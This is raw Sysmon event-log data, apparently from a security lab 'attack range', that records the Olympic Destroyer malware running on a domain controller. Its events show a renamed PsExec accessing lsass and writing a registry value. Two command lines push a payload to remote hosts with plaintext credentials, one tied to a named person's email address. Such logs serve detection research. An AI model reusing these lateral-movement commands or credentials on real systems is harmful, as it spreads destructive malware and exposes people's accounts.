10:56:49.682{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.687{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.682{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.682{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.667{C8EA50B7-12F1-6216-A405-000000003802}63803860C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.667{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.667{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.667{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.662{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A405-000000003802}6380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.645{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A405-000000003802}6380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.629{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A305-000000003802}6916C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.629{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A305-000000003802}6916C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.614{C8EA50B7-12F1-6216-A305-000000003802}69165960C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.583{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A305-000000003802}6916C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.583{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A305-000000003802}6916C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.567{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.567{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.567{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.567{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.530{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.530{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.533{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.530{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.530{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.514{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.514{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.498{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.498{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A005-000000003802}2956C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 